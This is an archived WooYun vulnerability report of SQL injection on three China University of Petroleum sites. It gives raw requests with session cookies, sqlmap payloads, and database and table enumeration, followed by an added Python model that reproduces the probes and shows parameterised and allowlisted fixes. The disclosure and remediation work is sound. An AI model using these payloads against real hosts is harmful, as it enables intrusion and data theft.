WooYun (WooYun.org) historical vulnerability archive---http://wy.zone.ci/
WooYun Drops articles online--------http://drop.zone.ci/
2015-11-23: Details sent to the vendor, awaiting vendor handling
2015-11-23: Vendor confirmed; details disclosed to the vendor only
2015-12-03: Details disclosed to core white hats and relevant domain experts
2015-12-13: Details disclosed to ordinary white hats
2015-12-23: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public
As titled.
1.
http://gis.upc.edu.cn/
POST /list.php HTTP/1.1
Content-Length: 64
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://gis.upc.edu.cn
Host: gis.upc.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

id=A&mapstyle=3d
The id parameter is injectable.
sqlmap identified the following injection point(s) with a total of 44 HTTP(s) requests:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=A' AND 2473=2473 AND 'dLxg'='dLxg&mapstyle=3d

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=A' AND (SELECT * FROM (SELECT(SLEEP(5)))ARmn) AND 'lrBi'='lrBi&mapstyle=3d

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=A' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a706271,0x67424e4756504d755a56634a66785550585a76635a7654757871737561534c63636f6f53524a7868,0x7162627071)-- -&mapstyle=3d
---
web application technology: PHP 5.4.0, Apache 2.2.22
back-end DBMS: MySQL 5.0.12

---
web application technology: PHP 5.4.0, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
available databases [5]:
[*] gis
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

---
web application technology: PHP 5.4.0, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
Database: gis
+----------+---------+
| Table    | Entries |
+----------+---------+
| unit     | 232     |
| building | 46      |
+----------+---------+
2.
GET /dzjs/web1/lmcode.asp?fs=5&lm=128&ord=asc HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://jpkc.upc.edu.cn
Cookie: ASPSESSIONIDSASSCQCC=EPMBNOMBNJILHBBAPKKCDBGK; ASPSESSIONIDQATQCQDD=KKBENGLBGIHICLLEODCGIBKK; %CE%EF%C0%ED%CA%B5%D1%E9%D1%A7%CF%B0%CD%F8%D5%BE=Skin=; ASPSESSIONIDSATQCQDD=MKBENGLBBGKFHBCEBINKCMGO; reglevel=; fullname=; purview=; UserName=; KEY=; content=; CNZZDATA2983488=cnzz_eid%3D1346510288-1447852925-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1447852925; sdmenu_my_menu=001; cod=2.7; csd=10
Host: jpkc.upc.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: lm (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fs=5&lm=128 AND 3383=3383&ord=asc
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5
current user: None
current database: None
current user is DBA: True
3.
China University of Petroleum lecture site http://lecture.upc.edu.cn
POST /index.php?s=/Home/Article/search.html HTTP/1.1
Content-Length: 178
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://lecture.upc.edu.cn
Cookie: PHPSESSID=41a8a364rrvs24nhhesk0n48t2; onethink_home_history=think%3A%7B%22t1447850802%22%3A%22%257B%2522name%2522%253A%2522%255Cu5927%255Cu5b66%255Cu751f%255Cu5fc3%255Cu7406%255Cu53d1%255Cu5c55%2522%252C%2522id%2522%253A%252222%2522%252C%2522cover_id%2522%253A%252211%2522%257D%22%7D; Hm_lvt_d8805ffa4435c9dd63a0aafa73e79573=1447851185,1447851185,1447851185; Hm_lpvt_d8805ffa4435c9dd63a0aafa73e79573=1447851185; HMACCOUNT=BCF7C5391584366D; bdshare_firstime=1447851245627
Host: lecture.upc.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

order=1&q=1&time=all&type=all
The order parameter is injectable.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: order (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: order=1 RLIKE (SELECT (CASE WHEN (5345=5345) THEN 1 ELSE 0x28 END))&q=1&time=all&type=all
---
back-end DBMS: MySQL 5
available databases [5]:
[*] cms
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

---
back-end DBMS: MySQL 5
Database: cms
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| cms_play_history      | 68317   |
| cms_search            | 5893    |
| cms_action_log        | 4213    |
| cms_ucenter_member    | 2406    |
| cms_member            | 2405    |
| cms_digg              | 553     |
| cms_document          | 553     |
| cms_picture           | 553     |
| cms_document_vod      | 538     |
| cms_auth_rule         | 239     |
| cms_menu              | 130     |
| cms_online            | 112     |
| cms_attribute         | 65      |
| cms_config            | 55      |
| cms_comment           | 30      |
| cms_favorite          | 26      |
| cms_addons            | 17      |
| cms_category          | 17      |
| cms_auth_extend       | 16      |
| cms_hooks             | 16      |
| cms_document_live     | 15      |
| cms_action            | 11      |
| cms_silde             | 11      |
| cms_channel           | 7       |
| cms_model             | 6       |
| cms_auth_group        | 3       |
| cms_auth_group_access | 3       |
| cms_pages             | 3       |
| cms_suggestions       | 3       |
| cms_links             | 2       |
| cms_server            | 2       |
+-----------------------+---------+
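The sqlmap findings in sections 1 and 3 are two different shapes of the same bug: in section 1 the `id` value is spliced into a WHERE clause, so the boolean pair `2473=2473` / `2473=2474` and the 11-column UNION both work; in section 3 the `order` value lands in an ORDER BY clause, where binding a parameter is not an option and a CASE expression still lets the attacker steer the result. The following is an added example and not code from gis.upc.edu.cn, lecture.upc.edu.cn or the original report. It models both clauses against a constructed SQLite table (the `unit` table, its two rows and the `1`/`2` sort codes are assumptions, not the real schema), reimplements sqlmap's true/false probe to show why concatenated queries are detectable, and places the fix beside each vulnerable form: a bound parameter for the WHERE value, an allowlist for the ORDER BY column. SQLite has no RLIKE, so the ORDER BY probe uses the CASE expression alone.

```python
"""Added example, not code from the reported sites: a constructed SQLite model of the
two injection classes sqlmap reported above (value concatenated into a WHERE clause, and
an attacker-controlled ORDER BY expression), each beside its fix."""
import sqlite3

# Constructed stand-in for the `unit` table; the real gis/cms data is not reproduced.
SCHEMA = """
CREATE TABLE unit (id TEXT PRIMARY KEY, name TEXT);
INSERT INTO unit VALUES ('A', 'Library'), ('B', 'Administration');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


# --- case 1: value spliced into a WHERE clause (the `id` parameter of list.php) ---

def lookup_vulnerable(conn, unit_id):
    # Same shape as PHP's "... WHERE id='$id'": a quote in the input closes the string
    # literal and whatever follows is parsed as SQL.
    sql = f"SELECT name FROM unit WHERE id='{unit_id}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_fixed(conn, unit_id):
    # Bound parameter: the value travels separately and never becomes SQL text.
    sql = "SELECT name FROM unit WHERE id=?"
    return [row[0] for row in conn.execute(sql, (unit_id,))]


# --- case 2: expression spliced into ORDER BY (the `order` parameter of search.html) ---

ALLOWED_ORDER = {"1": "id", "2": "name"}  # assumed mapping of the site's numeric codes


def search_vulnerable(conn, order):
    sql = f"SELECT name FROM unit ORDER BY {order}"
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn, order):
    # Identifiers cannot be bound as parameters, so map the input through an allowlist
    # and reject anything else instead of interpolating it.
    column = ALLOWED_ORDER.get(order)
    if column is None:
        raise ValueError("unsupported sort order")
    return [row[0] for row in conn.execute(f"SELECT name FROM unit ORDER BY {column}")]


# --- the probe sqlmap uses: a payload pair differing only in one condition ---

def boolean_blind_probe(query, true_payload, false_payload):
    """Return True when the two payloads give different responses, i.e. the database
    evaluated the injected condition. An exception counts as one fixed 'error page'."""
    def respond(payload):
        try:
            return query(payload)
        except (sqlite3.Error, ValueError) as exc:
            return ("error", type(exc).__name__)
    return respond(true_payload) != respond(false_payload)


# Pair in the form sqlmap reported for `id`; the constants differ by one.
ID_TRUE = "A' AND 2473=2473 AND 'dLxg'='dLxg"
ID_FALSE = "A' AND 2473=2474 AND 'dLxg'='dLxg"

# ORDER BY pair: the CASE picks the sort column, so truth shows up as result order.
ORDER_TRUE = "(CASE WHEN 5345=5345 THEN id ELSE name END)"
ORDER_FALSE = "(CASE WHEN 5345=5346 THEN id ELSE name END)"

# One-column analogue of the UNION extraction: the `--` comments out the trailing quote.
UNION_PAYLOAD = "x' UNION ALL SELECT name FROM sqlite_master WHERE type='table'--"


def probe_id(conn, lookup):
    return boolean_blind_probe(lambda p: lookup(conn, p), ID_TRUE, ID_FALSE)


def probe_order(conn, search):
    return boolean_blind_probe(lambda p: search(conn, p), ORDER_TRUE, ORDER_FALSE)


def enumerate_tables_via_union(conn):
    return lookup_vulnerable(conn, UNION_PAYLOAD)


if __name__ == "__main__":
    conn = connect()
    print("id, concatenated   :", probe_id(conn, lookup_vulnerable))      # True
    print("id, parameterised  :", probe_id(conn, lookup_fixed))           # False
    print("order, concatenated:", probe_order(conn, search_vulnerable))   # True
    print("order, allowlisted :", probe_order(conn, search_fixed))        # False
    print("tables via UNION   :", enumerate_tables_via_union(conn))       # ['unit']
```

The probe returns False against the fixed versions for two different reasons: the bound parameter makes both payloads an ordinary (non-matching) lookup, while the allowlist makes both payloads the same rejection. Either way the responses no longer depend on the injected condition, which is exactly the signal sqlmap's boolean-based check looks for.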
4.
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-11-23 15:33
Thank you for your attention to the university's network security; we will resolve this issue as soon as possible.
None yet